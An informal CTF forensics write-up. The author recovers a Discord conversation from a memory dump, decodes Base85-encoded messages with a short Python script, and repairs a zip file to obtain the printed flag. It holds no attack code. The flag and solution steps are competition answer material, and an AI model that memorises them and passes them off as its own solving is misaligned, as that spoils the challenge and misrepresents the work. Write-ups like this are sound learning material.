So it was Discord, I was going to dump the screen again but we are running low on time (I join the CTF at the mark of 4 hours left) so I decided to take a leap of faith, I guessed, if it run when the ram got captured it will store the message inside, I tried grepping for some of Discord’s unique keyword like “mention” and the author name =))) “C2uru” and I was right, it really there.
this is the whole conversation anyway
hello, it's me, code name 0x69m
Mokay, 0x69. How do we communicate on discord now? Do we need to obfuscate it?m
fLet's put it this way, we use base encoding in python library and convert the bytes to long data type.m
well, let's do it nowm
QF)=qaFgZCeGdMXkFg7_iF*!6aGBG(eGBY<fH#RUdGB7zgGBr6kHaIjjH#RdhGdDCaFf}tcGdDFfI5sxm
>F*!LjG&eOiG%__cGcY(cHa9XiGcq|dH#IjnGBGhUH#0UhG%+zUGc-6gGcom
>F*!LjG&eOiG%__cGcY(cHa9XiGcq|dH#IjnGBGhUH#0UhG%+zUGc-6gGcom
LGBq|aGBP$dGdDLkFgG<bI50LdH8wCcHZ?FbG&V3dH#j&lG&MLgF*h?dI5#*jI5agfIW#voGBEm
F*Z3iGdMXiI5jsgF*G<bF)=eSG&eChGB+?cHZnOdF*7$fHa0OfH#0akI5smdG%+<aH90UbGd46iIXN~qHZU|ZH#0IZHZnIfG&VIhHZeFhGBPtcH#s#pFf=tXG&VQm
0IW{sgF)=kaI5;>lH#9OhH8(gmFf=kWH#9ObFgY?aI50RhH!um
VGcq<eF)}teGBP(fGc`6hGch<hIWjOfGB+_XI5;sgH!w0bFflPWGB7zbGBY_iH#IUfGch+ZGdVaoF*7hUH2m
iF)=YTGc`0aGcYhWHaRphF*GqaI5RLeH#RpoGc-9eHZwLgGC4LlFfleYGB!9fF*i6jH8wFfF*7wYH8e9aIW{yfG&VOiFf=$YF*G?dG&wUeH8C+aIXE;lF*7nXHaIajFgP_gF*Z3hF*G$aGBY$dF*YzZHa9plH!(0aF*P$XI5sylFgP(aG%+|bGch+gI5;ykG&L|aHaRjdGBPnWIW#mhHZw3bFfueXH#s&oF*G?eI5{>jH#jpeIW;shI50IhF)}hVG&wUjGchqaFfundH#s>pH#0anGc_?VH8wIcHZnLlIWRaiFgP|eH8V0dIW{vnGdMLdHZwUlGc!3hHZ?RgH8V6bIXE`m
GchwVIWRCeH8?aiGcq+bI5;sfGcq_bGd3|ZG&4CdF*Z3iH8L?WIWRRbG&eCYH8wLbH8?RbHZnLdH90gjH8(RbH8eOeF)=qWH8?mkFg7wWG&naiGd4FcIW;mhIWaOeIWjUcIW#gcHaIyjGch+fG&VOjIWsgcIRm
G%+(XGd4LjHZ(FcH90dmHaRpoFfubaH83$ZGBhwSH90mkG&V3dGB`LkHZm|bI5;;pFflYWGBz_bGBY<aGdDLmG&D0ZGchnUG%`6cGcz_gH8L<cHa0LfF)}tYH8L|WI5RacH#9ajI5IagGBGzeG&MIlHZ?alH!?6WGdD0XF)=wfH#RpkGcz(VFfcVUH!(FZIWsdbH83+dFg7wbF)%VXFfcMQG&nObH8C(VH8(LhF*G+eGBYzYGBG(cF)=bXG%zzZH8M5m
IW#ggIXE>lH#ssjGC4RfHZV3aH!?6dGcz_dH!wCZI59afF*z|aGBGqVFgY?gF)%SWFfcVSFf%wfHaRddHa9jgIXF2oF*GnYG&eUiI50CdFf%bYG&C|YH#RpnH90mlGB!6gF)%ncIWjdcG&ndkG&C?YI5RmlFgY|iF*G?dH#RmhH#9ghH#RUgFf}zYGch+cI5svkF*r3dF)}qbF)}tYH#aadFgY+VI59IaG%+(XIXE>nFgP|gIWspmHZeFcF)%eVH90XhHvm
iF)=YTGc`0aGcYhWHaRphF*GqaI5RLeH#RpoGc-9eHZwLgGC4LlFfleYGB!9fF*i6jH8wFfF*7wYH8e9aIW{yfG&VOiFf=$YF*G?dG&wUeH8C+aIXE;lF*7nXHaIajFgP_gF*Z3hF*G$aGBY$dF*YzZHa9plH!(0aF*P$XI5sylFgP(aG%+|bGch+gI5;ykG&L|aHaRjdGBPnWIW#mhHZw3bFfueXH#s&oF*G?eI5{>jH#jpeIW;shI50IhF)}hVG&wUjGchqaFfundH#s>pH#0anGc_?VH8wIcHZnLlIWRaiFgP|eH8V0dIW{vnGdMLdHZwUlGc!3hHZ?RgH8V6bIXE`m
VGcq<eF)}teGBP(fGc`6hGch<hIWjOfGB+_XI5;sgH!w0bFflPWGB7zbGBY_iH#IUfGch+ZGdVaoF*7hUH2mmake sure to get rid of the “m” at the end of each string and some may have “f” at the beginning. So they said something about we use base encoding in python library and convert the bytes to long data type It guessing time (or you can use Cyberchef)
I see it positive to Base85, so I use this script to decode it back
from Crypto.Util.number import long_to_bytes
import base64
def Debase85(file_path):
with open(file_path, 'r') as file:
for line in file:
line = line.strip()
try:
decoded_data = base64.b85decode(line)
byte_data = long_to_bytes(int(decoded_data))
print(f"Original: {line}")
print(f"Value: {byte_data}")
print()
except Exception as e:
print(f"Failed to decode line")
Debase85('chat.txt')
There a google drive link, it lead to a unknow file
This part where I failed, I don’t know how to fix it back, after the CTFs end I read “warlocksmurf” Write-up about it, and got some hint how to do it, after researching I found this write-up following the write-up I managed to put back the Filename length but still wrong at some point I don’t know why
After trying for hours, I finally reach-out to WarLockSmurf and we had a conversation.
Anyway, here the zip file after fixing it.
and got the Flag, big thanks to WarlockSmurt.
Flag: TCP1P{w0w_y0u_m4n4ged_t0_get_this_d0cument.I_4s_the_fi4ncé_0f_mizuh4r4_chizuru_4ppreci4te_y0ur_eff0rts_GGWP}
Thanks for reading y’all, from BlitzHack with love, happyhacking
Raviyelna
Simple guy who in fond of white/silver hair girl also DFIR and RE
Categories